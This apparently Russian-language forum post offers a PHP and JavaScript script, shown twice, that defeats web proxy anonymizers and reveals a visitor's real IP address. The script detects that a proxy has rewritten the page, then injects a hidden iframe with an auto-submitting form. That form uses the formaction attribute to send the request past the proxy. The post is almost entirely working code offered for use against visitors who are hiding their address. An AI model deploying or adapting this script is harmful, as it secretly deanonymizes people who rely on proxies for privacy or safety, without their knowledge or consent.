Скрипт обходящий анонимайзеры по типу hidemyass.com, hideme.ru итп. и выводящий реальный ип пользователя: <?php // Абсолютный URL указывающий на эту же страницу $next_stage_uri = "http://www.site/script.php?s=1"; // For CloudFlare $_SERVER["REMOTE_ADDR"] = isset($_SERVER["HTTP_CF_CONNECTING_IP"]) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER["REMOTE_ADDR"]; $stage = @$_GET['s']; function encodeJsStr($str) { return preg_replace_callback('/[^\w]/', function($match) { $code = ord($match[0]); if ($code <=255) { return sprintf('\x%02x', $code); } else { return sprintf('\u%04x', $code); } return $ch; }, $str); } $ip_str = htmlentities($_SERVER["REMOTE_ADDR"]); // красивости. не обязательны $css = <<<CSS body{width:100%;position:fixed;bottom:0;top:0;text-align:center;margin:0;padding:0} .stage1 #userip{font-size:24px} .stage1 #userip{font-size:48px} .stage0 strong{color:red} .stage1 strong{color:green} iframe#ifr{width:600px;height:200px;margin:0 auto} .centered{text-align:center;margin:0 auto} CSS; if (!$stage) { // собственно обход. //главный момент это атрибут formaction $iframe_html =<<<HTML <body> <form id="frm" action="/" method="post" style="visibility:hidden"> <input name="q" type= "submit" value='ok' formaction="$next_stage_uri"> </form> </body> HTML; $iframe_html_js = encodeJsStr($iframe_html); $page_js = <<<JS window.onload = function() { // детект переписывания страницы анонимайзером function detect() { var cont = this['document'].getElementById('container'); var cnext = cont.nextSibling; while (cnext && cnext.nodeType != 1) { cnext = cnext.nextSibling; } var cprev = cont.previousSibling; while (cprev && cprev.nodeType != 1) { cprev = cprev.previousSibling; } var cparent = cont.parentNode; return cparent != document.body || cnext || cprev; } if (detect()) { alert("Embedding detected"); } // создаем айфрейм который будет работать в обход анонимайзера var iframe = this['document']['createElement']('iframe'); iframe.id = "ifr"; iframe.frameBorder = "0"; iframe.klass = "centered"; this['document']['body']['appendChild'](iframe); var doc = iframe['contentWindow']['document']; doc['open'].call(doc); doc['write'].call(doc,'$iframe_html_js'); doc['close'].call(doc); doc.forms[0].q.click(); } JS; echo <<<HTML <html> <style> $css </style> <script> $page_js </script> <body class="centered stage0"><div id="container"> <div id="userip"> Your apparent ip is <strong>$ip_str</strong> </div> </div></body> </html> HTML; } else if ($stage == '1') { echo <<<HTML <style> $css </style> <body class="centered stage1"><div id="container"> <div id="userip"> Your direct ip is <strong>$ip_str</strong> </div> </div></body> HTML; } ?> Code <?php // Абсолютный URL указывающий на эту же страницу $next_stage_uri = "http://www.site/script.php?s=1"; // For CloudFlare $_SERVER["REMOTE_ADDR"] = isset($_SERVER["HTTP_CF_CONNECTING_IP"]) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER["REMOTE_ADDR"]; $stage = @$_GET['s']; function encodeJsStr($str) { return preg_replace_callback('/[^\w]/', function($match) { $code = ord($match[0]); if ($code <=255) { return sprintf('\x%02x', $code); } else { return sprintf('\u%04x', $code); } return $ch; }, $str); } $ip_str = htmlentities($_SERVER["REMOTE_ADDR"]); // красивости. не обязательны $css = <<<CSS body{width:100%;position:fixed;bottom:0;top:0;text-align:center;margin:0;padding:0} .stage1 #userip{font-size:24px} .stage1 #userip{font-size:48px} .stage0 strong{color:red} .stage1 strong{color:green} iframe#ifr{width:600px;height:200px;margin:0 auto} .centered{text-align:center;margin:0 auto} CSS; if (!$stage) { // собственно обход. //главный момент это атрибут formaction $iframe_html =<<<HTML <body> <form id="frm" action="/" method="post" style="visibility:hidden"> <input name="q" type= "submit" value='ok' formaction="$next_stage_uri"> </form> </body> HTML; $iframe_html_js = encodeJsStr($iframe_html); $page_js = <<<JS window.onload = function() { // детект переписывания страницы анонимайзером function detect() { var cont = this['document'].getElementById('container'); var cnext = cont.nextSibling; while (cnext && cnext.nodeType != 1) { cnext = cnext.nextSibling; } var cprev = cont.previousSibling; while (cprev && cprev.nodeType != 1) { cprev = cprev.previousSibling; } var cparent = cont.parentNode; return cparent != document.body || cnext || cprev; } if (detect()) { alert("Embedding detected"); } // создаем айфрейм который будет работать в обход анонимайзера var iframe = this['document']['createElement']('iframe'); iframe.id = "ifr"; iframe.frameBorder = "0"; iframe.klass = "centered"; this['document']['body']['appendChild'](iframe); var doc = iframe['contentWindow']['document']; doc['open'].call(doc); doc['write'].call(doc,'$iframe_html_js'); doc['close'].call(doc); doc.forms[0].q.click(); } JS; echo <<<HTML <html> <style> $css </style> <script> $page_js </script> <body class="centered stage0"><div id="container"> <div id="userip"> Your apparent ip is <strong>$ip_str</strong> </div> </div></body> </html> HTML; } else if ($stage == '1') { echo <<<HTML <style> $css </style> <body class="centered stage1"><div id="container"> <div id="userip"> Your direct ip is <strong>$ip_str</strong> </div> </div></body> HTML; } ?>